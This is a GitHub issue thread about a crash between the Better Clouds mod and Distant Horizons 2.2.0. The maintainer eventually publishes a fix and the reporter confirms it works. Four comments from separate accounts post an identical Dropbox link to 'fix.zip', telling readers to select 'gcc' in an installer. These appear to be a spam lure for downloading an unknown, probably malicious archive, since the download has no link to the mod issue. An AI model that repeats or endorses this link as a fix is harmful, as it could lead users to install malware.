### ISSUE TITLE
Crash with Distant Horizons 2.2.0-a-1.21.1

### ISSUE THREAD

**Issue by Owehttamy** [Qendolin/better-clouds#140]
## Description
> Runtime error

### System Environment
- GPU: RTX 2070 Super
- Mod Version: Better Clouds (1.7.1+1.21-r)
- OS: Windows 11

*Optional:*
- Shader Pack: N/A
- Other Mods: None, but here's everything else anyway
- - Distant Horizons (2.2.0-a-1.21.1)
- - Fabric API (0.102.0+1.21)
- - Mod Menu (11.0.2)
- - Text Placeholder API (2.4.1+1.21)
- - YetAnotherConfigLib (3.5.0+1.21-fabric)

### Game Log / Crash Report
> https://mclo.gs/tZLpsLJ

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Owehttamy** [comment]
James explained what happened [here](https://www.youtube.com/watch?v=zuQDgamAZsU&t=23s), but the gist is that 2.2.0 moved clouds, so they render above the block height limit, which is reflected in their new API. [Iris 1.8.0](https://modrinth.com/mod/iris/version/1.8.0-beta.3+1.21-fabric) already has resolved this breaking change, so it might be worth looking into how IMS and the Iris team did it.
Thanks for your work!

**Comment by Qendolin** [comment]
The new DH version is already compatible, but I was expecting the new version to be 3.0.0, not 2.2.0. Should be a quick fix

**Comment by Zortabre** [comment]
What do you mean the new DH version is compatible? I'm still having issues with these mods conflicting and I'm forced to use the older version of DH

**Comment by Qendolin** [comment]
Sorry, i totally forgot about the issue. I've already fixed it, just forgot to publish. Now i just need to figure out why the project isn't building again...

**Comment by Zortabre** [comment]
Haha, I've been checking in to see when this mod would be updated. I'm glad I reminded you about this

**Comment by Qendolin** [comment]
Took a few hours of troubleshooting but now it's published. The issue should be fixed

**Comment by Zortabre** [comment]
Thank you!!

**Comment by Owehttamy** [comment]
> Took a few hours of troubleshooting but now it's published. The issue should be fixed

I can confirm it is resolved.
